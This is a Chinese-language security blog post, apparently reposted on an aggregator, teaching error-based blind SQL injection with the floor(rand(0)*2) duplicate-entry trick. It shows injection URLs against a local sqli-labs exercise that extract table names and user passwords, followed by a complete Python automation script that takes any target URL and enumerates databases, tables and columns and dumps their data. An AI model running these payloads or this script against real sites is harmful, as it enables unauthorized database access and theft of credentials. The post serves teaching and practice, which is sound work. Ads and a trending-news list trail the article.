sql盲注之报错注入(附自动化脚本)
作者:__LSA__0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Duplicate entry报错: 一句话概括就是多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息。 关键是查询时会建立临时表存储数据,不存在键值就插入,group by使插入前rand()会再执行一次,存在就直接值加1,下面以rand(0)简述原理: 首先看看接下来会用到的几个函数 Count()计算总数 Concat()连接字符串 Floor()向下取整数 Rand()产生0~1的随机数 rand(0)序列是011011


192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+

192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+

192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+

192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select password from users limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+




#coding:utf-8 #Author:LSA #Description:blind sqli error base script #Date:20171222 import sys import requests import re import binascii from termcolor import * import optparse fdata = [] def judge_columns_num(url): for i in range(1,100): columns_num_url = url + '\'' + 'order by ' + str(i) + '--+' rsp = requests.get(columns_num_url) rsp_content_length = rsp.headers['content-length'] if i==1: rsp_true_content_length = rsp_content_length continue if rsp_content_length == rsp_true_content_length: continue else: print (colored('column nums is ' + str(i-1),"green",attrs=["bold"])) columns_num = i break def getDatabases(url): dbs_url = url + "' union select 1,count(*),concat((select count(distinct+table_schema) from information_schema.tables),0x26,floor(rand(0)*2))x from information_schema.tables group by x;--+" dbs_html = requests.get(dbs_url).content dbs_num = int(re.search(r'\'(\d*?)&',dbs_html).group(1)) print "databases num:" + colored(dbs_num,"green",attrs=["bold"]) dbs = [] print ("dbs name: ") for dbIndex in xrange(0,dbs_num): db_name_url = url + "' union select 1,count(*),concat((select distinct table_schema from information_schema.tables limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % dbIndex db_html = requests.get(db_name_url).content db_name = re.search(r'\'(.*?)&', db_html).group(1) dbs.append(db_name) print (colored("\t%s" % db_name,"green",attrs=["bold"])) def getTables(url, db_name): #db_name_hex = "0x" + binascii.b2a_hex(db_name) tables_num_url = url + "' union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema='%s'),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % db_name tables_html = requests.get(tables_num_url).content tables_num = int(re.search(r'\'(\d*?)&',tables_html).group(1)) print ("databases %s,tables num: %d" % (db_name, tables_num)) print ("tables name: ") for tableIndex in xrange(0,tables_num): table_name_url = url + "'union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name, tableIndex) table_html = requests.get(table_name_url).content table_name = re.search(r'\'(.*?)&',table_html).group(1) print (colored("\t%s" % table_name,"green",attrs=["bold"])) def getColumns(url,db_name,table_name): #db_name_hex = "0x" + binascii.b2a_hex(db_name) #table_name_hex = "0x" + binascii.b2a_hex(table_name) dataColumns_num_url = url + "' union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema='%s' and table_name='%s' ),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name,table_name) dataColumns_html = requests.get(dataColumns_num_url).content dataColumns_num = int(re.search(r'\'(\d*?)&',dataColumns_html).group(1)) print ("table: %s,dataColumns num: %d" % (table_name, dataColumns_num)) print ("DataColumns name:") for dataColumnIndex in xrange(0,dataColumns_num): dataColumn_name_url = url + "' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name,table_name,dataColumnIndex) dataColumn_html = requests.get(dataColumn_name_url).content dataColumn_name = re.search(r'\'(.*?)&',dataColumn_html).group(1) print (colored("\t\t%s" % dataColumn_name,"green",attrs=["bold"])) def dumpData(url,db_name,table_name,inputColumns_name): #db_name_hex = "0x" + binascii.b2a_hex(db_name) #table_name_hex = "0x" + binascii.b2a_hex(table_name) dataColumns_num_url = url + "' union select 1,count(*),concat((select count(*) from %s.%s),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (db_name,table_name) data_html = requests.get(dataColumns_num_url).content datas = int(re.search(r'\'(\d*?)&',data_html).group(1)) inputColumns = inputColumns_name.split(',') print (colored("Total datas: " + str(datas),"green",attrs=["bold"])) print str(inputColumns_name) + ":" for inputColumnIndex in xrange(0,len(inputColumns)): for dataIndex in xrange(0,datas): dataColumn_name_url = url + "' union select 1,count(*),concat((select %s from %s.%s limit %d,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+" % (inputColumns[inputColumnIndex],db_name,table_name,dataIndex) data_html = requests.get(dataColumn_name_url).content data = re.search(r'\'(.*?)&',data_html).group(1) fdata.append(data) print (colored("\t%s" % data,"green",attrs=["bold"])) for inputc in range(0,len(inputColumns)): print str(inputColumns[inputc]) + "\t", print "" print "+++++++++++++++++++++++++++++++++++++++++++++++++" n = len(fdata) / len(inputColumns) for t in range(0,n): for d in range(t,len(fdata),n): print colored(fdata[d],"green",attrs=["bold"]) + "\t", print "" print "+++++++++++++++++++++++++++++++++++++++++++++++++" def main(): parser = optparse.OptionParser('python %prog '+\ '-h <manual>') parser.add_option('-u', dest='tgtUrl', type='string',\ help='input target url') parser.add_option('--dbs', dest='dbs', action='store_true', help='get dbs') parser.add_option('--tables', dest='tables', action='store_true',\ help='get tables') parser.add_option('--columns', dest='columns', action='store_true',\ help='get columns') parser.add_option('-D', dest='db', type='string', help='choose a db') parser.add_option('-T', dest='table', type='string',\ help='choose a table') parser.add_option('-C', dest='column', type='string',\ help='choose column(s)') parser.add_option('--dump', dest='data', action='store_true',\ help='get datas') (options, args) = parser.parse_args() url = options.tgtUrl dbs = options.dbs tables = options.tables columns = options.columns db = options.db table = options.table column = options.column datas = options.data if url and (dbs is None and db is None and tables is None and table is None and columns is None and column is None and datas is None): judge_columns_num(url) if url and dbs: getDatabases(url) if url and db and tables: getTables(url,db) if url and db and table and columns: getColumns(url,db,table) if url and db and table and column and datas: dumpData(url,db,table,column) if __name__ == '__main__': main()如不想切换转义字符可到本人博客复制代码:www.lsablog.com/network_security/penetration/error-based-blind-sqli/ 效果图:


>>>>>黑客入门必备技能 带你入坑,和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩!
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 推动干部能上能下 7914355
- 2 亚冬会遭美国等地网络攻击超27万次 7931653
- 3 外交部回应美方对华加征34%关税 7814301
- 4 清明假期“短途游”成热门选择 7754547
- 5 3名菲律宾间谍落网 相貌曝光 7629300
- 6 “内鬼”柯雪琴被查 涉严重违纪违法 7528771
- 7 特朗普向无人岛加税 岛上挤满了企鹅 7494856
- 8 CBA名帅刘维伟被妻子实锤出轨 7333718
- 9 中方将反制美国所谓对等关税 7246825
- 10 美疑禁止其驻华人员与中国公民恋爱 7108513